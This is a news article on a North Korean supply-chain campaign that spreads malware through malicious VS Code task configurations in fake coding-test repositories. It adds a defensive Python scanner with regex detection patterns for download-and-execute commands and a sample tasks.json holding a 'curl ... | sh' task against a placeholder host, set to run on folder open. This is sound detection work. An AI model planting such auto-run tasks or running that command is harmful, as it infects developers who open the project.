
North Korean hackers operate self-propagating supply chain hack


The North Korean state-sponsored threat group Void Dokkaebi, also tracked as Famous Chollima, has used fake job interviews to infect developers with malware as part of a self-propagating supply chain campaign, GBHackers News reports.

The attacks begin with operators posing as recruiters for cryptocurrency or AI firms, who lure developers into cloning seemingly legitimate GitHub or GitLab repositories to complete a coding exam, according to an analysis by Trend Micro researchers. The repositories carry a malicious Visual Studio Code configuration: opening the folder in VS Code triggers an automatic task that fetches and runs the malware. Because the infected developer's own work is then committed to a repository that still contains the malicious .vscode configuration, anyone who later clones that repository is infected in turn, so every additional victim becomes a distributor of the malware. Such automatic tasks only execute once the user has trusted the workspace and allowed automatic tasks, which is why VS Code's Workspace Trust prompt should not be waved through for a repository received from a stranger, and why a freshly cloned repository's .vscode directory deserves a look before the folder is opened.
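The following is an added example, not code from the article or from the Trend Micro report: a small scanner that walks a checkout, finds every .vscode/tasks.json, and reports tasks configured to run on folder open, flagging those whose command line looks like a download-and-execute stub. The trigger it looks for is VS Code's own automatic-task mechanism (runOptions.runOn set to "folderOpen"); the suspicious-command patterns, the sample tasks.json, and the hostname example.invalid are constructed for this illustration and are not indicators from the report. It also handles the edge case that tasks.json is JSONC (comments and trailing commas are legal there), which a plain JSON parser would choke on.

```python
"""Scan a checkout for VS Code tasks that run automatically on folder open."""
import json
import os
import re
import tempfile
from pathlib import Path

# Heuristic payload-fetch/exec patterns (assumption for this example, not report IOCs).
SUSPICIOUS = [
    r"\bcurl\b.*\|\s*(ba)?sh\b",
    r"\bwget\b.*\|\s*(ba)?sh\b",
    r"\bpowershell\b.*\s-(e|enc|encodedcommand)\b",
    r"\bnode\s+-e\b",
    r"\bpython3?\s+-c\b",
    r"\bbase64\s+(-d|--decode)\b",
    r"\b(Invoke-Expression|Invoke-WebRequest|iex)\b",
]


def strip_jsonc(text):
    """Remove // and /* */ comments (outside strings) and trailing commas so json.loads accepts tasks.json."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:      # keep escaped char, e.g. \" inside a string
                out.append(text[i + 1])
                i += 2
                continue
            if c == '"':
                in_str = False
            i += 1
        elif c == '"':
            in_str = True
            out.append(c)
            i += 1
        elif text.startswith("//", i):
            j = text.find("\n", i)
            i = n if j == -1 else j
        elif text.startswith("/*", i):
            j = text.find("*/", i + 2)
            i = n if j == -1 else j + 2
        else:
            out.append(c)
            i += 1
    # Trailing-comma cleanup is applied to the whole text; good enough for config files.
    return re.sub(r",(\s*[}\]])", r"\1", "".join(out))


def load_tasks_json(text):
    """Parse tasks.json content (JSONC) into a dict."""
    return json.loads(strip_jsonc(text))


def task_command(task):
    """Flatten a task's command, args and per-OS overrides into one string for matching."""
    parts = [str(task.get("command", ""))]
    for a in task.get("args") or []:
        parts.append(a if isinstance(a, str) else str(a.get("value", a)))
    for os_key in ("windows", "linux", "osx"):
        sub = task.get(os_key) or {}
        parts.append(str(sub.get("command", "")))
        parts.extend(str(a) for a in sub.get("args") or [])
    return " ".join(p for p in parts if p)


def auto_tasks(tasks_json_text):
    """Return (label, command, suspicious) for every task with runOptions.runOn == folderOpen."""
    findings = []
    for task in load_tasks_json(tasks_json_text).get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue
        cmd = task_command(task)
        hit = any(re.search(p, cmd, re.IGNORECASE) for p in SUSPICIOUS)
        findings.append((task.get("label", "<unnamed>"), cmd, hit))
    return findings


def scan_repo(root):
    """Walk a checkout; map each .vscode/tasks.json (relative path) to its auto-run tasks."""
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        if os.path.basename(dirpath) == ".vscode" and "tasks.json" in files:
            path = Path(dirpath) / "tasks.json"
            rel = str(path.relative_to(root))
            try:
                results[rel] = auto_tasks(path.read_text(encoding="utf-8"))
            except (ValueError, UnicodeDecodeError) as exc:   # unparseable config is itself worth a look
                results[rel] = [("<parse error>", str(exc), True)]
    return results


# Constructed sample tasks.json (not an artifact from the report); one benign and one
# download-and-execute task, both set to fire when the folder is opened.
SAMPLE_TASKS_JSON = r'''{
  // tasks.json is JSONC: comments and trailing commas are legal here.
  "version": "2.0.0",
  "tasks": [
    { "label": "install deps", "type": "shell", "command": "npm", "args": ["ci"],
      "runOptions": { "runOn": "folderOpen" }, },
    { "label": "test", "type": "shell", "command": "npm test" },
    { "label": "postinstall", "type": "shell",
      "command": "curl -fsSL https://example.invalid/setup.sh | sh",
      "runOptions": { "runOn": "folderOpen" }, /* fires once the workspace is trusted */ }
  ]
}'''


def demo():
    """Write the sample into a temporary checkout and scan it, as one would a fresh clone."""
    with tempfile.TemporaryDirectory() as root:
        vs = Path(root) / "project" / ".vscode"
        vs.mkdir(parents=True)
        (vs / "tasks.json").write_text(SAMPLE_TASKS_JSON, encoding="utf-8")
        return scan_repo(root)


if __name__ == "__main__":
    for rel, tasks in demo().items():
        for label, cmd, hit in tasks:
            print(f"{'SUSPICIOUS' if hit else 'auto-run  '} {rel}: {label!r} -> {cmd}")
```

Run it against a clone before opening the folder in VS Code; anything listed as auto-run deserves a read, and a flagged line is reason not to grant workspace trust. The patterns are deliberately loose and will miss an obfuscated loader, so treat an empty result as "nothing obvious", not as clean.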

Void Dokkaebi was also observed injecting code directly into repositories, concealing the changes with a tool that rewrites Git history to tamper with commits. Several blockchain networks were used to host and deploy multiple payloads, including a DEV#POPPER remote access trojan. In all, the campaign compromised more than 750 repositories, planted over 500 malicious VS Code task configurations and injected the commit-tampering tool into 101 repositories.
